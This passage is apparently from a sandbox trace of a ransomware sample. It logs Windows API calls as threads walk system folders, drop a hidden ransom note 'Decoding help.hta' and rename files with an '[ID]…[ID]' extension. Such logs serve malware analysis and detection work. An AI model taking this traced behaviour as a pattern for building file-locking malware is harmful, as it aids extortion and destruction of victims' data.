dwReserved1=0x0, cFileName="msadox28.tlb", cAlternateFileName="")) returned 1 [0051.687] lstrcpyW (in: lpString1=0x10a18b40, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0051.687] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0051.687] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" [0051.687] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0051.687] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadox28.tlb") returned -1 [0051.687] lstrlenW (lpString="msadox28.tlb") returned 12 [0051.687] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0051.687] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0051.688] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="msadox28.tlb" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" [0051.688] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" [0051.688] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0051.688] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\msadox28.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.688] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf55bba, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xbf55bba, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x347dbdb0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadrh15.dll", cAlternateFileName="")) returned 1 [0051.688] lstrcpyW (in: lpString1=0x10a18b40, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0051.688] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0051.688] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" [0051.688] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\decoding help.hta")) returned 0x1 [0051.688] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msadrh15.dll") returned -1 [0051.688] lstrlenW (lpString="msadrh15.dll") returned 12 [0051.688] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*" [0051.688] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\*.*") returned 48 [0051.688] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\", lpString2="msadrh15.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll" [0051.688] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll" [0051.688] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0051.688] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msadrh15.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\ado\\msadrh15.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.688] FindNextFileW (in: hFindFile=0x5e2d70, lpFindFileData=0x1c31fd30 | out: lpFindFileData=0x1c31fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf55bba, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xbf55bba, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x347dbdb0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadrh15.dll", cAlternateFileName="")) returned 0 [0051.688] FindClose (in: hFindFile=0x5e2d70 | out: hFindFile=0x5e2d70) returned 1 Thread: id = 433 os_tid = 0xbc8 [0043.910] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*.*", lpFindFileData=0x1c45fd30 | out: lpFindFileData=0x1c45fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2d30 [0045.177] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.177] FindNextFileW (in: hFindFile=0x5e2d30, lpFindFileData=0x1c45fd30 | out: lpFindFileData=0x1c45fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.177] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.177] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.177] FindNextFileW (in: hFindFile=0x5e2d30, lpFindFileData=0x1c45fd30 | out: lpFindFileData=0x1c45fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb313d55, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb313d55, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x16e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32res.dll.mui", cAlternateFileName="")) returned 1 [0045.177] lstrcpyW (in: lpString1=0x42b0868, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*.*" [0045.177] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*.*") returned 50 [0045.177] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\Decoding help.hta" [0045.178] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\en-us\\decoding help.hta")) returned 0xffffffff [0045.178] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0045.464] WriteFile (in: hFile=0x230, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1c45fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1c45fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.465] CloseHandle (hObject=0x230) returned 1 [0045.465] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.665] lstrcmpiW (lpString1="Decoding help.hta", lpString2="wab32res.dll.mui") returned -1 [0048.665] lstrlenW (lpString="wab32res.dll.mui") returned 16 [0048.665] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*.*" [0048.665] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\*.*") returned 50 [0048.665] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\", lpString2="wab32res.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" [0048.665] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" [0048.665] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0048.665] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\en-us\\wab32res.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0049.889] FindNextFileW (in: hFindFile=0x5e2d30, lpFindFileData=0x1c45fd30 | out: lpFindFileData=0x1c45fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb313d55, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb313d55, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x16e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32res.dll.mui", cAlternateFileName="")) returned 0 [0049.889] FindClose (in: hFindFile=0x5e2d30 | out: hFindFile=0x5e2d30) returned 1 Thread: id = 434 os_tid = 0xbc4 [0044.193] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*", lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3530 [0045.535] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.535] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.808] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.808] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.808] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34c44b4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa34c44b4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa05a2bb2, ftLastWriteTime.dwHighDateTime=0x1ca03fb, nFileSizeHigh=0x0, nFileSizeLow=0x276, dwReserved0=0x0, dwReserved1=0x0, cFileName="adcjavas.inc", cAlternateFileName="")) returned 1 [0048.808] lstrcpyW (in: lpString1=0x42b8870, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0048.808] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0048.808] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0048.808] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0xffffffff [0048.808] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0050.384] WriteFile (in: hFile=0x480, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1c59fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1c59fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.537] CloseHandle (hObject=0x480) returned 1 [0053.666] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.621] lstrcmpiW (lpString1="Decoding help.hta", lpString2="adcjavas.inc") returned 1 [0057.621] lstrlenW (lpString="adcjavas.inc") returned 12 [0057.621] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0057.621] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0057.621] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="adcjavas.inc" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" [0057.621] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" [0057.622] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc.[ID]g9uZrLhJaygpwRm1[ID]" [0057.622] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.995] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34ea611, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa34ea611, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa063b126, ftLastWriteTime.dwHighDateTime=0x1ca03fb, nFileSizeHigh=0x0, nFileSizeLow=0x26f, dwReserved0=0x0, dwReserved1=0x0, cFileName="adcvbs.inc", cAlternateFileName="")) returned 1 [0058.995] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0058.995] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0058.995] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0058.996] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0058.996] lstrcmpiW (lpString1="Decoding help.hta", lpString2="adcvbs.inc") returned 1 [0058.996] lstrlenW (lpString="adcvbs.inc") returned 10 [0058.996] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0058.996] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0058.996] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="adcvbs.inc" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" [0058.996] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" [0058.996] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc.[ID]g9uZrLhJaygpwRm1[ID]" [0058.996] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.996] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0058.996] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0058.996] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0058.996] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0058.996] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0058.996] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0058.996] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US" [0058.996] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*.*" [0058.996] GlobalMemoryStatus (in: lpBuffer=0x1c59fd10 | out: lpBuffer=0x1c59fd10) [0058.997] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10ba6450, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x958 [0058.997] CloseHandle (hObject=0x958) returned 1 [0058.997] FindNextFileW (in: hFindFile=0x5e3530, lpFindFileData=0x1c59fd30 | out: lpFindFileData=0x1c59fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cac9e93, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0x2cac9e93, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0x2cac9e93, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x206, dwReserved0=0x0, dwReserved1=0x0, cFileName="handler.reg", cAlternateFileName="")) returned 1 [0058.997] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0058.997] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0058.998] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" [0058.998] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msadc\\decoding help.hta")) returned 0x1 [0058.998] lstrcmpiW (lpString1="Decoding help.hta", lpString2="handler.reg") returned -1 [0058.998] lstrlenW (lpString="handler.reg") returned 11 [0058.998] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*" [0058.998] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\*.*") returned 50 [0058.998] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\", lpString2="handler.reg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg" [0058.998] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg" [0058.998] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.998] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg" (normalized: "c:\\program files\\common files\\system\\msadc\\handler.reg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common 